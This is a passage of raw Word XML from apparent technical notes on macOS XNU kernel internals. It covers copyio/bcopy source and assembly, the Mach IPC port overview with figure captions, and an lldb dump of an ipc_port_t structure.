          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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kernel_addr</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mach_msg_size_t nbytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRPr="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRPr="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> copyio</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COPYIN</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user_addr</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kernel_addr</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nbytes</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NULL</w:t>
      </w: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w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B25045" w:rsidRPr="00B25045" w:rsidRDefault="00B25045" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B25045" w:rsidRPr="00B25045" w:rsidRDefault="00B25045" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>copyio</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> copy_type</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 xml:space="preserve"> user_addr_t user_addr</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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kernel_addr</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B25045" w:rsidRPr="00B25045" w:rsidRDefault="00B25045" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       vm_size_t nbytes</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 xml:space="preserve"> vm_size_t </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lencopied</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> use_kernel_map</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</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If the no_shared_cr3 boot-arg is set (true), the kernel runs on </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its own pmap and cr3 rather than the user's -- so that wild accesses</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from kernel or kexts can be trapped. So, during copyin and copyout,</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we need to switch back to the user's map/cr3. The thread is flagged</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CopyIOActive" at this time so that if the thread is pre-empted,</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 we will later restore the correct cr3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B25045" w:rsidRDefault="00B25045" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</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6"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B25045" w:rsidRPr="00B25045" w:rsidRDefault="00B25045" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Ensure that we're running on the target thread's cr3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B25045" w:rsidRDefault="00B25045" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25045">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00155225" w:rsidRDefault="00155225" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155225">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\x86_64\copyio.c</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 Copyin/out from user/kernel address space.</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 rdi: source address</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 rsi: destination address</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 rdx: byte count</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Entry(_bcopy)</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TODO not pop regs; movq; think about 32 bit or 64 bit byte count</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xchgq   %rdi, %rsi      /* source %rsi, dest %rdi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cld             /* count up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movl    %edx,%ecx       /* move by longwords first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shrl    $3,%ecx</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COVERY_SECTION</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COVER(_bcopy_fail)</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p</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movsq               /* move longwords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movl    %edx,%ecx       /* now move remaining bytes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andl    $7,%ecx</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COVERY_SECTION</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COVER(_bcopy_fail)</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p</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movsb</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xorl    %eax,%eax       /* return 0 for success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ret             /* and return */</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_bcopy_fail:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00155225" w:rsidRPr="00155225" w:rsidRDefault="00155225" w:rsidP="00155225">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155225">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    movl    $(EFAULT),%eax      /* return error for failure */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00155225" w:rsidRDefault="00155225" w:rsidP="009E4967">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155225">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4967" w:rsidRDefault="009E4967" w:rsidP="009E4967">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E4967" w:rsidRDefault="0008705F" w:rsidP="009E4967">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc445313351"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="009E4967">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ort</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w:rsidR="00CF0C16" w:rsidRPr="00BD3E41" w:rsidRDefault="00745DA3" w:rsidP="00CF0C16">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0C16" w:rsidRPr="00CF0C16" w:rsidRDefault="00CF0C16" w:rsidP="00CF0C16"/>
    <w:p w:rsidR="00C10981" w:rsidRDefault="00C10981" w:rsidP="00C10981">
      <w:pPr>
        <w:ind w:firstLineChars="50" w:firstLine="110"/>
      </w:pPr>
      <w:r>
        <w:t>The IPC space encapsulates the knowledge necessary to translate between task-specific (local) port names and kernel-wide (global) port data structures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10981" w:rsidRDefault="00C10981" w:rsidP="00C10981">
      <w:pPr>
        <w:ind w:firstLineChars="50" w:firstLine="110"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332AB555" wp14:editId="11790B69">
            <wp:extent cx="5274310" cy="431590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315900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10981" w:rsidRDefault="00C10981" w:rsidP="00C10981">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLineChars="50" w:firstLine="110"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339CF5FB" wp14:editId="279576D3">
            <wp:extent cx="5274310" cy="5345122"/>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345122"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10981" w:rsidRDefault="00C10981" w:rsidP="00C10981">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>An overview of the kernel processing for sending a Mach IPC message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265C08" w:rsidRDefault="00265C08" w:rsidP="00265C08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B0ACFB0" wp14:editId="4EA884FD">
            <wp:extent cx="5274310" cy="6587393"/>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6587393"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265C08" w:rsidRDefault="00265C08" w:rsidP="00265C08">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An overview of the kernel processing for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>receiving</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a Mach IPC message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265C08" w:rsidRPr="00265C08" w:rsidRDefault="00265C08" w:rsidP="00265C08"/>
    <w:p w:rsidR="0008705F" w:rsidRPr="00BD3E41" w:rsidRDefault="0008705F" w:rsidP="0008705F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0008705F">
        <w:t>ipc_port_t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0008705F" w:rsidRPr="0008705F" w:rsidRDefault="0008705F" w:rsidP="0008705F"/>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lldb) expr -T -A -L -- *((ipc_port_t)0xffffff801fc07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d0: (ipc_port) $20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lastRenderedPageBreak/>
        <w:t>0x00007fb8b87784d0:   (ipc_object) ip_object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d0:     (ipc_object_bits_t) io_bits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d4:     (ipc_object_refs_t) io_references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d8:     (lck_spin_t) io_lock_data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d8:       (uintptr_t) interlock = 0xffffffff0025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ipc_mqueue) ip_messages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ipc_mqueue::(anonymous union)) data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ipc_mqueue::(anonymous struct)) port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waitq) waitq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2) waitq_type = 1</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fifo = 1</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prepost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irq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27) waitq_eventmask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8:           (hw_lock_data_t) waitq_interlock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8:             (uintptr_t) lock_data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f0:           (uint64_t) waitq_set_id = 18446743524457990696</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f8:           (uint64_t) waitq_prepost_id = 1844674352450696060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00:           (queue_head_t) waitq_queue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00:             (queue_entry *) next = 0xffffff801fc09a7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08:             (queue_entry *) prev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lastRenderedPageBreak/>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0:         (ipc_kmsg_queue) messages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0:           (ipc_kmsg *) ikmq_base = 0xffffff8020f5e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8:         (mach_port_seqno_t) seqno = 55291852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c:         (mach_port_name_t) receiver_name = 429496716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0:         (uint16_t) msgcount = 5324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2:         (uint16_t) qlimit = 8436</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ipc_mqueue::(anonymous struct)) pset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waitq_set) setq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waitq) wqset_q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2) waitq_type = 1</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fifo = 1</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prepost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1) waitq_irq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0:             (uint32_t:27) waitq_eventmask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8:             (hw_lock_data_t) waitq_interlock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e8:               (uintptr_t) lock_data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f0:             (uint64_t) waitq_set_id = 18446743524457990696</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4f8:             (uint64_t) waitq_prepost_id = 1844674352450696060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00:             (queue_head_t) waitq_queue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lastRenderedPageBreak/>
        <w:t>0x00007fb8b8778500:               (queue_entry *) next = 0xffffff801fc09a7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08:               (queue_entry *) prev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0:           (uint64_t) wqset_id = 18446743524506722304</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18:           (uint64_t) wqset_prepost_id = 1844674352450665624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0:         (mach_port_name_t) local_name = 552914944</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sprequests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spimportant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impdonation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tempowner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guarded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1) ip_strict_guard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4:   (natural_t:2) ip_reserved = 2</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5:   (natural_t:24) ip_impcount = 16777215</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8:   (ipc_port::(anonymous union)) data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8:     (ipc_space *) receiver = 0xffffff800bcebb8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8:     (ipc_port *) destination = 0xffffff800bcebb88</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28:     (ipc_port_timestamp_t) timestamp = 1980978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lastRenderedPageBreak/>
        <w:t>0x00007fb8b8778530:   (ipc_port::(anonymous union)) kdata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30:     (ipc_kobject_t) kobject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30:     (ipc_importance_task_t) imp_task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30:     (uintptr_t) alias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38:   (ipc_port *) ip_nsrequest = 0x0000000200000002</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40:   (ipc_port *) ip_pdrequest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48:   (ipc_port_request *) ip_requests = 0x0000001f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50:   (ipc_kmsg *) ip_premsg = 0x000000000000003f</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58:   (mach_vm_address_t) ip_context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60:   (mach_port_mscount_t) ip_mscount = 4294967295</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64:   (mach_port_rights_t) ip_srights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68:   (mach_port_rights_t) ip_sorights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6c:   (thread_t) ip_thread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74:   (unsigned long) ip_timetrack = 429496729600207</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7c:   (uintptr_t [16]) ip_callstack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7c:     (uintptr_t) [0] = 0x01e3d88b000000d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84:     (uintptr_t) [1] = 0x039fbead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8c:     (uintptr_t) [2]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94:     (uintptr_t) [3]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9c:     (uintptr_t) [4]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a4:     (uintptr_t) [5] = 0x20f8f580ffffffff</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ac:     (uintptr_t) [6] = 0x20f8f2e0ffffff8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b4:     (uintptr_t) [7] = 0x20f8f580ffffff8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lastRenderedPageBreak/>
        <w:t>0x00007fb8b87785bc:     (uintptr_t) [8] = 0x00000000ffffff8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c4:     (uintptr_t) [9]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cc:     (uintptr_t) [10]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d4:     (uintptr_t) [11]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dc:     (uintptr_t) [12]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e4:     (uintptr_t) [13]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ec:     (uintptr_t) [14]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f4:     (uintptr_t) [15] = 0x000000000000000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fc:   (unsigned long [4]) ip_spares =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5fc:     (unsigned long) [0]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604:     (unsigned long) [1]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60c:     (unsigned long) [2]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0x00007fb8b8778614:     (unsigned long) [3] = 0</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 xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF63B0" w:rsidRPr="00CF63B0"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4967" w:rsidRDefault="00CF63B0" w:rsidP="00CF63B0">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
